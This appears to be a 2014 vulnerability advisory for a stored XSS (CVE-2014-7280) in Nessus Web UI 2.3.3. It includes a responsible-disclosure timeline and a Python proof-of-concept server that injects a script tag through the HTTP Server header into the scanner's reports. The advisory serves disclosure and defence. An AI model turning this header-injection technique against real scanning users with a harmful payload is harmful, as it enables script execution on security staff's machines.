Nessus Web UI 2.3.3 - Stored XSS

2014-10-09 18:05:07

Nessus Web UI 2.3.3: Stored XSS

CVE number: CVE-2014-7280
Vendor advisory:

-- Info --

Nessus is a proprietary comprehensive vulnerability scanner which is developed by Tenable Network Security. Tenable Network Security estimates that it is used by over 75,000 organisations worldwide.

-- Affected version -

Web UI version 2.3.3, Build #83

-- Vulnerability details --

By setting up a malicious web server that returns a specially crafted host header, an attacker is able to execute javascript code on the machine of the person performing a vulnerability scan of the web server. No escaping on javascript code is being performed when passing the server header to the affected Web UI version via a plugin.
The javascript code will be stored in the backend database, and will execute every time the target views a report that returns the server header.

-- POC --

#!/usr/bin/env python
import sys
from twisted.web import server, resource
from twisted.internet import reactor
from twisted.python import log

class Site(server.Site):
def getResourceFor(self, request):
request.setHeader('server', '<script>alert(1)</script>SomeServer')
return server.Site.getResourceFor(self, request)

class HelloResource(resource.Resource):
isLeaf = True
numberRequests = 0

def render_GET(self, request):
self.numberRequests += 1
request.setHeader("content-type", "text/plain")
return "theSecurityFactory Nessus POC"

reactor.listenTCP(8080, Site(HelloResource()))

-- Solution --

This issue has been fixed as of version 2.3.4 of the WEB UI.

-- Timeline --

2014-06-12 Release of Web UI version 2.3.3, build#83

2014-06-13 Vulnerability discovered and creation of POC

2014-06-13 Vulnerability responsibly reported to vendor

2014-06-13 Vulnerability acknowledged by vendor

2014-06-13 Release of Web UI version 2.3.4, build#85

2014-XX-XX Advisory published in coordination with vendor

-- Credit --

Frank Lycops
Frank.lycops [at]


No fixes

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